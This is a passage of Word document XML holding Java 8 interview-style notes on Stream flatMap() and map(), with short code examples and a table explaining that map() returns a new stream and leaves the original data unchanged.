      <w:tr w:rsidR="002240EB" w:rsidRPr="00CE4B95" w14:paraId="44BD859F" w14:textId="77777777" w:rsidTr="00313557">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="510A98F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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E9AC13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31F2A55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Stream&lt;R&gt;&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002240EB" w:rsidRPr="00CE4B95" w14:paraId="5A139595" w14:textId="77777777" w:rsidTr="00313557">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35BBF323"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="066B5F6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6037DC8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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C5E68F8"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E5255">
          <v:rect id="_x0000_i1729" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEDC4E5"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8A72DA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608F3CCD"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re dealing with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nested structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721C7C35"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produces </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D5E122"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flatten</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> them into a single stream for further processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71349857" w14:textId="66FE3D9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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3645BE52" w14:textId="77777777" w:rsidR="009E69C4" w:rsidRPr="00CE4B95" w:rsidRDefault="009E69C4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="247" w:name="_Toc197867461"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use map method in java 8 stream?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="247"/>
    </w:p>
    <w:p w14:paraId="2296832E" w14:textId="3DA0B460"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he Use of map() Method in Java 8 Stream?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03332F5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method in Java 8 Stream API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element of the stream into another form. It takes a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Function&lt;T, R&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as an argument and produce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with the transformed values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DABD5D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2C79FF5">
          <v:rect id="_x0000_i1731" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2437DD59"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0E335EF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R&gt; Stream&lt;R&gt; map(Function&lt;? super T, ? extends R&gt; mapper);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE4BEB"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03952">
          <v:rect id="_x0000_i1732" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4366AF"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of map()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C7527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vert to Uppercase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B47C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siddhant", "arpan");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1DB93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upperNames = names.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B57BB4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6FB7E75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329A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SIDDHANT, ARPAN]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196196A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xtract Field from Object List:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDD71F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D6AD1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5EB468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DFD18E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B260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3248ED" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865BD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B245B4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empList = ...;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCF8373" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865BD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF28A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empNames = empList.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B915E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658A86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E5D7E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vert Integers to Squares:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C804CC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6CE0D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s = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFABD6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4040C05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F2035C8"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1, 4, 9, 16]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BC0183"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B3C4EE">
          <v:rect id="_x0000_i1733" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0492DFDA"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1A258D5"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ransforms each element </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one-to-one</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C36A46B"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 it returns a new stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774E69D2"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data conversion, field extraction, transformations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163E8C0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uld you like to see map() in a more advanced use case like DTO conversion or using it in a microservices scenario?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3FF58B" w14:textId="5DF850D7"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34" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A09D35C" w14:textId="3E380AB8" w:rsidR="008E2975" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2975" w:rsidP="008E2975">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="248" w:name="_Toc197867462"/>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Does map() change existing data?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="248"/>
    </w:p>
    <w:p w14:paraId="3677D780" w14:textId="5A32ECD1" w:rsidR="008E2975" w:rsidRPr="008E2975" w:rsidRDefault="008E2975" w:rsidP="00EA0264">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, map() does </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NOT modify</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the original data (input list or collection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9313FB" w14:textId="77777777" w:rsidR="008E2975" w:rsidRPr="008E2975" w:rsidRDefault="008E2975" w:rsidP="00236C34">
      <w:pPr>
        <w:ind w:firstLine="360"/>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 xml:space="preserve">It </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>creates a new stream</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with transformed elements, </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>leaving the original data unchanged</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B724CCA"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example to prove:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6128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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> names </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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Siddhant"</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008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Patni"</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666140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3BF9D9C6"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stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2466FB"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map</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>toUpperCase</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8F9429"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collect</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Collectors</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>toList</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2533AECE"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23573792" w14:textId="17D16C7B"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System</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w: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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Original list still: [Siddhant, Patni]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533995E2" w14:textId="17E283CA" w:rsidR="008E2975" w:rsidRPr="008E2975" w:rsidRDefault="008E2975" w:rsidP="008E2975">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6337ED3F"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Quick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90"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E2975" w:rsidRPr="008E2975" w14:paraId="002CA743" w14:textId="77777777" w:rsidTr="008E2975">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7395642C"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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4530E777"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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E2975" w:rsidRPr="008E2975" w14:paraId="48B78006" w14:textId="77777777" w:rsidTr="008E2975">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C195F7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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="046F9BC5"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Transform each element</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E2975" w:rsidRPr="008E2975" w14:paraId="6836F61E" w14:textId="77777777" w:rsidTr="008E2975">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42B74D8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Changes Original?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D253A37"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o, original data stays the same</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E2975" w:rsidRPr="008E2975" w14:paraId="6452F0CA" w14:textId="77777777" w:rsidTr="008E2975">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F8CC83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Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76E9043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ew Stream with mapped elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BA94942" w14:textId="14F2C809" w:rsidR="008E297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7E69BC5">
          <v:rect id="_x0000_i1735" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="218E27C6" w14:textId="77777777" w:rsidR="00A32340" w:rsidRPr="00CE4B95" w:rsidRDefault="00A32340">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
